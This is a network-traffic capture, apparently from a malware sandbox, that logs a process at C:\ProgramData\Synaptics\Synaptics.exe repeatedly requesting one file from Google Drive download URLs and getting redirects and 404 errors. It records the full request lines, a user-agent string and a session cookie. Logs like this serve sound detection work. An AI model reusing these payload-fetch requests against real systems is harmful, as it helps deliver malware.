                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ydbs99JOBi9HAp8grEdALg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.5 | 50005 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:38 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC71DCQxEQS7SNdpA_QILkY_Y6NFo1aSaOkftQc2uZD4y1Aql8ZFApcmAL77vpam4UVt
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cq4LilOi5C6RsfnkmP7YQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="4NbG1olVMuSHHgF4QwTUYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:39 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.5 | 50012 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yUuDkk_pMRZhT2OvDNOgIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.5 | 50018 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:39 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC46Xyi4K3LTMHVquq3p_69J4YIEE8OFKXCgU1Yj9uJTI_W3Ysyvo2FmVC-fVRCpjA8Z
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:40 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-abJbao0U5fB7b42vgHSKVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="xrhHmTf8iQNd3gJECULLeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:40 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.5 | 50019 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:40 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-M_wV3hyylcoQAG5127ZXsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
121 | 192.168.2.5 | 50020 | 142.250.186.33 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:39 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:40 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6Yt7hR5gDg96uPAF0VxbzEHgWbr3F5_MrMBHzUEJQiT7uKBaORQSZ0HWfYcwSrd1vPirjEbwk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:40 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wEtQwri4xkRI5Hkq2OL9uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:40 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:40 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ln7CJfnZlmhFpkex4GbHNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:40 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.5 | 50026 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.5 | 50027 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.5 | 50028 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.5 | 50031 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:41 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4492YHstgwuiZknRwSmJSV7jqejVObH0Hn6NAkn15xJhMGgs5hwBlGWx9m6A92nzFSjDvipE0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:41 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-flzbECeX3sdxxoTkjvw38w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:41 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:41 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="gKTJtkftCN9-wMC8Qe7rsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:41 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.5 | 50038 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:41 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:41 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YFPHBvJElN_1HiXfE07I0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.5 | 50037 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:41 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:41 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-TVO95XPtFDQVK9k8VlA-XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.5 | 50045 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:42 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
